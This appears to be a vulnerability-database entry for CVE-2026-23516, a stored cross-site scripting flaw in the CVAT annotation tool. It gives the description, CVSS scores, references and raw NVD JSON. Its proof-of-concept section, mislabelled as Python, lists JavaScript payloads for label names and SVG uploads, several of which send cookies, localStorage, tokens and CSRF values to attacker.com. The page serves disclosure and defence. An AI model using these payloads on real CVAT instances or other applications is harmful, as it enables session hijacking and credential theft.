CVE-2026-23516

Description

CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.2.0 through 2.54.0, an attacker is able to execute arbitrary JavaScript in a victim user's CVAT UI session, provided that they are able to create a maliciously crafted label in a CVAT task or project, then get the victim user to either edit that label, or view a shape that refers to that label; and/or get the victim user to upload a maliciously crafted SVG image when configuring a skeleton. This gives the attacker temporary access to all CVAT resources that the victim user can access. Version 2.55.0 fixes the issue.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:* - VULNERABLE

CVAT 2.2.0 至 2.54.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-23516 存储型XSS PoC
// 攻击场景1：恶意标签名称
// 在创建标签时使用以下Payload：
const maliciousLabel = `<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">`;

// 攻击场景2：恶意SVG文件
const maliciousSVG = `
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.cookie)</script>
  <rect width="100" height="100" fill="red"/>
</svg>`;

// 攻击场景3：利用事件处理器
const eventBasedPayload = `
<svg xmlns="http://www.w3.org/2000/svg">
  <body onload="fetch('https://attacker.com/exfil?data='+btoa(JSON.stringify(localStorage)))">
    <rect width="100" height="100" fill="blue"/>
  </body>
</svg>`;

// 攻击场景4：利用JavaScript URI
const jsUriPayload = `<a href="javascript:fetch('https://attacker.com/steal?token='+localStorage.getItem('access_token'))">Click me</a>`;

// 攻击场景5：数据外传示例
const exfiltrationScript = `
<script>
  // 获取CSRF Token
  const csrfToken = document.querySelector('[name=csrfmiddlewaretoken]')?.value;
  
  // 收集敏感信息
  const sensitiveData = {
    cookies: document.cookie,
    localStorage: {...localStorage},
    sessionStorage: {...sessionStorage},
    csrfToken: csrfToken
  };
  
  // 外发数据
  fetch('https://attacker.com/api/collect', {
    method: 'POST',
    body: JSON.stringify(sensitiveData),
    headers: {'Content-Type': 'application/json'}
  });
</script>`;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23516
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23516
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23516/
[4] VulDB https://vuldb.com/cve/CVE-2026-23516
[5] https://github.com/cvat-ai/cvat/commit/40800707fe39e3ff76c8d036eb953eb12d764e70
[6] https://github.com/cvat-ai/cvat/security/advisories/GHSA-3m7p-wx65-c7mp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23516", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:49.850", "lastModified": "2026-02-20T20:08:06.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.2.0 through 2.54.0, an attacker is able to execute arbitrary JavaScript in a victim user's CVAT UI session, provided that they are able to create a maliciously crafted label in a CVAT task or project, then get the victim user to either edit that label, or view a shape that refers to that label; and/or get the victim user to upload a maliciously crafted SVG image when configuring a skeleton. This gives the attacker temporary access to all CVAT resources that the victim user can access. Version 2.55.0 fixes the issue."}, {"lang": "es", "value": "CVAT es una herramienta de anotación de video e imagen interactiva de código abierto para visión artificial. En las versiones 2.2.0 a la 2.54.0, un atacante es capaz de ejecutar JavaScript arbitrario en la sesión de la interfaz de usuario de CVAT de un usuario víctima, siempre que sea capaz de crear una etiqueta creada maliciosamente en una tarea o proyecto de CVAT, luego lograr que el usuario víctima edite esa etiqueta, o vea una forma que se refiera a esa etiqueta; y/o lograr que el usuario víctima cargue una imagen SVG creada maliciosamente al configurar un esqueleto. Esto le da al atacante acceso temporal a todos los recursos de CVAT a los que el usuario víctima puede acceder. La versión 2.55.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-83"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.2.0", "versionEndExcluding": "2.55.0", "matchCriteriaId": "4152356D-0D27-449D-A709-A15F7FD1665E"}]}]}], "references": [{"url": "https://github.com/cvat-ai/cvat/commit/40800707fe39e3ff76c8d036eb953eb12d764e70", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cvat-ai/cvat/security/advisories/GHSA-3m7p-wx65-c7mp", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}